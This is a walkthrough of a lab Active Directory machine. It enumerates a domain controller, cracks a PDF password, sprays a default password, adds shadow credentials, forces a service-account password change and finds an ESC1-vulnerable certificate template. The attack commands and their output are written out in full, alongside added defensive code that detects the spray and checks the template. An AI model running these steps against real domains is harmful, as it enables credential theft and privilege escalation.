Scenario: You are a member of the Hack Smarter Red Team. During a phishing engagement, you were able to retrieve credentials for the client’s Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client.
Starting Credentials
e.hills:Il0vemyj0b2025!
It is an easy-difficulty Active Directory machine on HackSmarter Labs.
Nmap
First, we scan for exposed services using Nmap.
└─$ nmap -v 10.0.27.151 -p- -oN nmap/ports_
Nmap scan report for 10.0.27.151
Host is up (0.026s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49679/tcp open unknown
49682/tcp open unknown
49715/tcp open unknown
49733/tcp open unknown
49880/tcp open unknown
From the port scan results, we can extract the port numbers with cut and tr, as shown below, to feed into the service scan.
└─$ echo '53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49679/tcp open unknown
49682/tcp open unknown
49715/tcp open unknown
49733/tcp open unknown
49880/tcp open unknown' | cut -d '/' -f1 | tr '\n' ','
53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49667,49679,49682,49715,49733,49880,
└─$ nmap -v 10.0.27.151 -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49667,49679,49682,49715,49733,49880 -A -oN nmap/service_
Nmap scan report for DC01.welcome.local (10.0.27.151)
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-25 13:50:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WELCOME
| NetBIOS_Domain_Name: WELCOME
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: WELCOME.local
| DNS_Computer_Name: DC01.WELCOME.local
| DNS_Tree_Name: WELCOME.local
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:51:29+00:00
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Issuer: commonName=DC01.WELCOME.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-27T15:46:43
| Not valid after: 2026-04-28T15:46:43
| MD5: 242b:566d:674b:702d:f73e:cee4:a92d:6581
|_SHA-1: 848f:035b:09f0:1735:2bc9:40b7:0f02:bee2:82c0:da7a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49679/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
49733/tcp open msrpc Microsoft Windows RPC
49880/tcp open msrpc Microsoft Windows RPC
The service scan shows LDAP certificates issued by WELCOME-CA, which indicates that Active Directory Certificate Services (AD CS) is deployed. Along with the port scan, I also like to use Netexec to check whether NTLM authentication is allowed or only Kerberos authentication is accepted by the Active Directory (AD) environment.
└─$ nxc smb 10.0.27.151
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
Since NTLM authentication is not disabled, we can use password authentication against the domain. Before we start enumerating services, let’s also add the host to our hosts file (/etc/hosts).
10.0.27.151 DC01.welcome.local welcome.local
Enumerating Services
As we have credentials, let’s start by enumerating the SMB service to see which shares the provided user can access. We can also use the credentials to collect BloodHound data.
BloodHound
└─$ nxc ldap 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!' --bloodhound -c all --dns-server 10.0.27.151
LDAP 10.0.27.151 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:WELCOME.local) (signing:None) (channel binding:Never)
LDAP 10.0.27.151 389 DC01 [+] WELCOME.local\e.hills:Il0vemyj0b2025!
LDAP 10.0.27.151 389 DC01 Resolved collection methods: rdp, group, psremote, acl, container, localadmin, session, trusts, objectprops, dcom
LDAP 10.0.27.151 389 DC01 Done in 0M 7S
LDAP 10.0.27.151 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.0.27.151_2026-01-25_143106_bloodhound.zip
Enumerating Shares
└─$ nxc smb 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!'
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\e.hills:Il0vemyj0b2025!
└─$ nxc smb 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!' --shares
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\e.hills:Il0vemyj0b2025!
SMB 10.0.27.151 445 DC01 [*] Enumerated shares
SMB 10.0.27.151 445 DC01 Share Permissions Remark
SMB 10.0.27.151 445 DC01 ----- ----------- ------
SMB 10.0.27.151 445 DC01 ADMIN$ Remote Admin
SMB 10.0.27.151 445 DC01 C$ Default share
SMB 10.0.27.151 445 DC01 Human Resources READ
SMB 10.0.27.151 445 DC01 IPC$ READ Remote IPC
SMB 10.0.27.151 445 DC01 NETLOGON READ Logon server share
SMB 10.0.27.151 445 DC01 SYSVOL READ Logon server share
We can see that this user has READ access to the ‘Human Resources’ share. Before enumerating the share, let’s get the user list and BloodHound data, as we already have valid credentials.
User Enumeration
We can use Netexec to get the list of users and save it in a file.
└─$ nxc smb 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt
Human Resources Share
We can use smbclient to enumerate the HR share.
└─$ smbclient \\\\10.0.27.151\\'Human Resources' -U e.hills
Password for [WORKGROUP\e.hills]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Sep 14 01:20:17 2025
.. D 0 Sat Sep 13 22:11:19 2025
Welcome 2025 Holiday Schedule.pdf A 84715 Sun Sep 14 00:18:12 2025
Welcome Benefits.pdf A 81466 Sun Sep 14 00:18:12 2025
Welcome Handbook Excerpts.pdf A 82644 Sun Sep 14 00:18:12 2025
Welcome Performance Review Guide.pdf A 79823 Sun Sep 14 00:18:12 2025
Welcome Start Guide.pdf A 89511 Sun Sep 14 00:18:12 2025
15568127 blocks of size 4096. 12046994 blocks available
smb: \>
We can download the files from the share with smbclient.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Welcome 2025 Holiday Schedule.pdf of size 84715 as Welcome 2025 Holiday Schedule.pdf (442.4 KiloBytes/sec) (average 442.4 KiloBytes/sec)
getting file \Welcome Benefits.pdf of size 81466 as Welcome Benefits.pdf (503.5 KiloBytes/sec) (average 470.4 KiloBytes/sec)
getting file \Welcome Handbook Excerpts.pdf of size 82644 as Welcome Handbook Excerpts.pdf (504.4 KiloBytes/sec) (average 481.2 KiloBytes/sec)
getting file \Welcome Performance Review Guide.pdf of size 79823 as Welcome Performance Review Guide.pdf (569.0 KiloBytes/sec) (average 499.9 KiloBytes/sec)
getting file \Welcome Start Guide.pdf of size 89511 as Welcome Start Guide.pdf (647.5 KiloBytes/sec) (average 525.6 KiloBytes/sec)
smb: \>
Going through the files, Welcome Start Guide.pdf is password-protected. We can use John the Ripper to attempt to crack the password, in case the file is protected by a weak one.
Shell as A.Harris
Cracking File Password
Before using John the Ripper, we have to convert the file into a hash format that John accepts, using pdf2john.

└─$ pdf2john Welcome\ Start\ Guide.pdf
Welcome Start Guide.pdf:$pdf$4*4*128*-1060*1*16*fc591b1749ad08498b60ce3a81947b8c*32*9abeeb4695a10ac7b5e6558d39ee8c8300000000000000000000000000000000*32*e3e7eecc056a1ca2a2b0298352b0970f96ff1503022a1146e322e2f215dfd6be
└─$ pdf2john Welcome\ Start\ Guide.pdf > start_guide.hash
└─$ john start_guide.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF, PDF encrypted document [MD5-RC4 / SHA2-AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Cost 2 (key length) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
[REDACTED] (Welcome Start Guide.pdf)
1g 0:00:00:11 DONE (2026-01-25 14:40) 0.08503g/s 78955p/s 78955c/s 78955C/s hunbeach..hulachica
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
The password for the file was successfully cracked using the rockyou.txt list. We can open the file with the cracked password. Going through the file, it mentions the default password for newly created accounts.
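The $pdf$ line above encodes everything John needs, and reading it explains the "Cost 1 (revision) is 4" and "Cost 2 (key length) is 128" lines. An added parser for that format (not part of the write-up or of pdf2john), using the hash printed above as sample input:

```python
"""Parse a pdf2john '$pdf$' line and report what protection the document actually has."""
from dataclasses import dataclass

# The hash pdf2john printed for 'Welcome Start Guide.pdf' above, copied as sample input.
SAMPLE = ("Welcome Start Guide.pdf:$pdf$4*4*128*-1060*1*16*fc591b1749ad08498b60ce3a81947b8c"
          "*32*9abeeb4695a10ac7b5e6558d39ee8c8300000000000000000000000000000000"
          "*32*e3e7eecc056a1ca2a2b0298352b0970f96ff1503022a1146e322e2f215dfd6be")

# /P permission flags of the standard security handler (the spec numbers bits from 1, so bit 3 == 1 << 2).
PERMISSION_BITS = {"print": 1 << 2, "modify": 1 << 3, "copy": 1 << 4, "annotate": 1 << 5}


@dataclass
class PdfHash:
    label: str          # file name pdf2john prefixed
    version: int        # /V
    revision: int       # /R  (john's 'Cost 1')
    key_bits: int       # /Length (john's 'Cost 2')
    permissions: int    # /P, signed 32-bit
    encrypt_metadata: bool
    doc_id: bytes       # first element of the trailer /ID
    u_entry: bytes      # /U: what john verifies a candidate password against
    o_entry: bytes      # /O: owner-password entry


def parse_pdf_hash(line: str) -> PdfHash:
    """Layout for revisions 2-4: $pdf$V*R*Length*P*EncryptMetadata*len(ID)*ID*len(U)*U*len(O)*O."""
    label, sep, body = line.partition(":$pdf$")
    if not sep:
        raise ValueError("not a pdf2john line")
    f = body.split("*")
    version, revision, key_bits, perms, meta = (int(x) for x in f[:5])
    if revision > 4:
        raise ValueError("revision 5/6 (AES-256) lines carry extra fields; not handled here")
    blobs = []
    for length_field, hex_field in ((f[5], f[6]), (f[7], f[8]), (f[9], f[10])):
        blob = bytes.fromhex(hex_field)
        if len(blob) != int(length_field):      # each length prefix must match its hex data
            raise ValueError("length field does not match hex data")
        blobs.append(blob)
    return PdfHash(label, version, revision, key_bits, perms, meta == 1, *blobs)


def permissions(h: PdfHash) -> dict:
    """Decode the /P bitmask into what the user password grants."""
    return {name: bool(h.permissions & bit) for name, bit in PERMISSION_BITS.items()}


def cipher(h: PdfHash) -> str:
    """Cipher implied by /R and /Length; for R4 the hash does not record whether RC4 or AES-128 was chosen."""
    if h.revision == 2:
        return "RC4-40"
    if h.revision == 3:
        return f"RC4-{h.key_bits}"
    return f"RC4-{h.key_bits} or AES-{h.key_bits} (crypt filter not in hash)"


def assessment(h: PdfHash) -> str:
    """Why the crack above finished in seconds: R2-R4 derive the key with MD5, so each guess is cheap."""
    return (f"{h.label}: R{h.revision}, {cipher(h)}, MD5-based key derivation; "
            "strength rests entirely on the password. Prefer AES-256 (R6) and a long passphrase.")


if __name__ == "__main__":
    parsed = parse_pdf_hash(SAMPLE)
    print(assessment(parsed))
    print(permissions(parsed))
```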

Spraying Default Password
We can spray the default password to see if any user is still using the default credentials. Netexec can be used for password spraying.
└─$ nxc smb 10.0.27.151 -u users.txt -p 'Welcome2025!@' --continue-on-success
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\Administrator:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\DC01$:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\e.hills:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\j.crickets:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\e.blanch:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\i.park:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\j.johnson:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\a.harris:Welcome2025!@
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\svc_ca:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\svc_web:Welcome2025!@ STATUS_LOGON_FAILURE
The output shows that the default password is still in use for one account, a.harris.
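On the DC, the spray above appears as a burst of failed logons against many different accounts from one source, followed by a single success. An added detection example (not from the write-up) that runs over constructed event tuples; the source IPs 10.0.27.50 and 10.0.27.77 are invented:

```python
"""Detect a password spray (one password, many accounts, one source) in Windows logon events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample mirroring the spray above: (timestamp, EventID, target account, source IP, status).
# Failed NTLM logons over SMB land on the DC as 4625 / 0xC000006D (STATUS_LOGON_FAILURE), a success as 4624.
SPRAY_SOURCE = "10.0.27.50"   # invented attacker host
SAMPLE_EVENTS = [
    ("2026-01-25T14:52:01", 4625, "Administrator", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:01", 4625, "DC01$", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:02", 4625, "e.hills", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:02", 4625, "j.crickets", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:03", 4625, "e.blanch", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:03", 4625, "i.park", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:04", 4625, "j.johnson", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:04", 4624, "a.harris", SPRAY_SOURCE, "0x0"),
    ("2026-01-25T14:52:05", 4625, "svc_ca", SPRAY_SOURCE, "0xC000006D"),
    ("2026-01-25T14:52:05", 4625, "svc_web", SPRAY_SOURCE, "0xC000006D"),
    # Benign noise: one user mistypes a password from another (invented) host, then logs in.
    ("2026-01-25T14:55:10", 4625, "j.johnson", "10.0.27.77", "0xC000006D"),
    ("2026-01-25T14:55:20", 4624, "j.johnson", "10.0.27.77", "0x0"),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return one alert per source that fails against >= min_accounts distinct accounts inside `window`.

    A spray is wide and shallow: many target accounts, few attempts each, one origin. Brute force
    against a single account (deep and narrow) is a different signal and is deliberately not matched.
    """
    by_source = defaultdict(list)
    for ts, event_id, account, source, _status in events:
        by_source[source].append((datetime.fromisoformat(ts), event_id, account))
    alerts = []
    for source, evs in by_source.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            failed, succeeded = set(), set()
            for t, event_id, account in evs[i:]:
                if t - start > window:
                    break
                (failed if event_id == 4625 else succeeded).add(account)
            if len(failed) >= min_accounts:
                alerts.append({
                    "source": source,
                    "window_start": start.isoformat(),
                    "failed_accounts": sorted(failed),
                    # Accounts that authenticated from the spraying host inside the same window:
                    # these are the ones to treat as compromised, as a.harris was above.
                    "successful_accounts": sorted(succeeded),
                })
                break  # one alert per source; later windows overlap this one
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```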

From the BloodHound data, this user is a member of Remote Management Users, so it can connect to the DC over the WinRM service.
User Flag
└─$ evil-winrm-py -i DC01.welcome.local -u a.harris
[evil-winrm-py v1.5.0 banner]
Password: *************
[*] Connecting to 'DC01.welcome.local:5985' as 'a.harris'
evil-winrm-py PS C:\Users\a.harris\Documents>
evil-winrm-py PS C:\Users\a.harris\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
evil-winrm-py PS C:\Users\a.harris\Documents> cd ..
evil-winrm-py PS C:\Users\a.harris> tree /f /a
Folder PATH listing
Volume serial number is 6478-0CDD
C:.
+---Desktop
| user.txt
|
+---Documents
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
\---Videos
evil-winrm-py PS C:\Users\a.harris> cd Desktop
evil-winrm-py PS C:\Users\a.harris\Desktop> type user.txt
[Flag_Redacted]
The user has no special privileges that could be exploited. The BloodHound data, however, shows edges that can be used to move laterally.
Shell as Administrator
Looking back at BloodHound, a.harris has GenericWrite over i.park. Rather than resetting the target user’s password, it is preferable to add shadow credentials, which leaves the account’s password untouched. We can use certipy to add shadow credentials.
Shadow Credentials

└─$ certipy-ad shadow auto -username a.harris@welcome.local -password 'Welcome2025!@' -account i.park -dc-ip 10.0.27.151 -ldap-scheme ldaps -dc-host DC01.welcome.local
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'i.park'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '61a69d84511a45fa894bf6c7f60f57ef'
[*] Adding Key Credential with device ID '61a69d84511a45fa894bf6c7f60f57ef' to the Key Credentials for 'i.park'
[*] Successfully added Key Credential with device ID '61a69d84511a45fa894bf6c7f60f57ef' to the Key Credentials for 'i.park'
[*] Authenticating as 'i.park' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'i.park@welcome.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'i.park.ccache'
[*] Wrote credential cache to 'i.park.ccache'
[*] Trying to retrieve NT hash for 'i.park'
[*] Restoring the old Key Credentials for 'i.park'
[*] Successfully restored the old Key Credentials for 'i.park'
[*] NT hash for 'i.park': b689c[..SNIPED..]
We can confirm that the credentials are valid using Netexec.
└─$ nxc smb 10.0.27.151 -u i.park -H 'b689c[..SNIPED..]'
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\i.park:b689c[..SNIPED..]
The newly compromised user has ForceChangePassword over two more accounts, svc_ca and svc_web. Given the naming convention, svc_ca may be the account to use when looking for vulnerable certificate templates, if any exist.

Therefore, rather than changing both users’ passwords at once, let’s target svc_ca first and see if those credentials turn up any vulnerable templates. Otherwise, we can come back to svc_web later.
Exploiting ESC1
└─$ nxc smb 10.0.27.151 -u i.park -H 'b689c[..SNIPED..]' -M change-password -o USER=svc_ca NEWPASS='Password123!'
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\i.park:b689c[..SNIPED..]
CHANGE-P... 10.0.27.151 445 DC01 [+] Successfully changed password for svc_ca
We can use the newly compromised user to enumerate vulnerable certificate templates using certipy.
└─$ certipy-ad find -vulnerable -u svc_ca -p 'Password123!' -dc-ip 10.0.27.151 -enabled
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'WELCOME-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'WELCOME-CA'
[*] Checking web enrollment for CA 'WELCOME-CA' @ 'DC01.WELCOME.local'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260125151736_Certipy.txt'
[*] Wrote text output to '20260125151736_Certipy.txt'
[*] Saving JSON output to '20260125151736_Certipy.json'
[*] Wrote JSON output to '20260125151736_Certipy.json'
Looking at the output file, one of the templates is vulnerable to ESC1.
└─$ cat 20260125151736_Certipy.txt
Certificate Authorities
0
CA Name : WELCOME-CA
DNS Name : DC01.WELCOME.local
Certificate Subject : CN=WELCOME-CA, DC=WELCOME, DC=local
Certificate Serial Number : 6E7A025A45F4E6A14E1F08B77737AFD9
Certificate Validity Start : 2025-09-13 16:39:33+00:00
Certificate Validity End : 2030-09-13 16:49:33+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : WELCOME.LOCAL\Administrators
Access Rights
ManageCa : WELCOME.LOCAL\Administrators
WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
ManageCertificates : WELCOME.LOCAL\Administrators
WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Enroll : WELCOME.LOCAL\Authenticated Users
Certificate Templates
0
Template Name : Welcome-Template
Display Name : Welcome-Template
Certificate Authorities : WELCOME-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-14T03:12:52+00:00
Template Last Modified : 2025-10-30T02:19:35+00:00
Permissions
Enrollment Permissions
Enrollment Rights : WELCOME.LOCAL\svc ca
WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Object Control Permissions
Owner : WELCOME.LOCAL\Administrator
Full Control Principals : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Write Owner Principals : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Write Dacl Principals : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Write Property Enroll : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
[+] User Enrollable Principals : WELCOME.LOCAL\svc ca
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
To exploit ESC1, an attacker requests a certificate from a vulnerable template that allows client authentication and lets the enrollee supply the subject, so the subject name is not tied to the requesting account. By specifying the Administrator (or another privileged user) in the subject alternative name, the attacker obtains a certificate that authenticates as that user. That certificate can then be used for Kerberos authentication (PKINIT) to obtain a TGT and ultimately the NTLM hash of the target account. We can use certipy to impersonate the administrator.
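The conditions just described, applied to the template properties Certipy printed above, as an added defender-side check (not Certipy’s code and not part of the write-up); the hardened variant shows which single setting breaks the chain:

```python
"""Evaluate a certificate template for the ESC1 conditions and list the settings that would close it."""

# Template properties transcribed from the Certipy output for Welcome-Template above.
WELCOME_TEMPLATE = {
    "name": "Welcome-Template",
    "enabled": True,
    "enrollee_supplies_subject": True,        # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    "extended_key_usage": ["Server Authentication", "Client Authentication"],
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": ["WELCOME.LOCAL\\svc ca",
                          "WELCOME.LOCAL\\Domain Admins",
                          "WELCOME.LOCAL\\Enterprise Admins"],
}

# EKUs under which an issued certificate can log a user on (PKINIT / Schannel).
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}
# Principals whose enrollment right is expected; anything else counts as low-privileged here.
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}


def low_priv_enrollers(rights):
    """Enrollment principals outside the privileged set (DOMAIN\\name -> name)."""
    return [p for p in rights if p.split("\\")[-1] not in PRIVILEGED]


def check_esc1(t):
    """Return the ESC1 verdict, each contributing condition, and the fixes that would break the chain."""
    eku = set(t["extended_key_usage"])
    conditions = {
        "enabled": t["enabled"],
        "client_auth_eku": not eku or bool(eku & AUTH_EKUS),   # empty EKU list means any purpose
        "enrollee_supplies_subject": t["enrollee_supplies_subject"],
        "no_manager_approval": not t["requires_manager_approval"],
        "no_signatures_required": t["authorized_signatures_required"] == 0,
        "low_priv_can_enroll": bool(low_priv_enrollers(t["enrollment_rights"])),
    }
    fixes = {
        "enrollee_supplies_subject": "clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the CA builds the subject from AD",
        "no_manager_approval": "require CA certificate manager approval for this template",
        "no_signatures_required": "require an authorized signature (enrollment agent) on requests",
        "low_priv_can_enroll": "remove Enroll from " + ", ".join(low_priv_enrollers(t["enrollment_rights"])),
        "client_auth_eku": "drop authentication EKUs if the template only serves server certificates",
    }
    esc1 = all(conditions.values())
    # Any single fix below is enough to break ESC1; the first one is the usual choice.
    return {"template": t["name"], "esc1": esc1, "conditions": conditions,
            "fixes": [fixes[k] for k in fixes if esc1 and conditions[k]]}


# The same template with the one setting ESC1 depends on most corrected.
HARDENED_TEMPLATE = dict(WELCOME_TEMPLATE, enrollee_supplies_subject=False)

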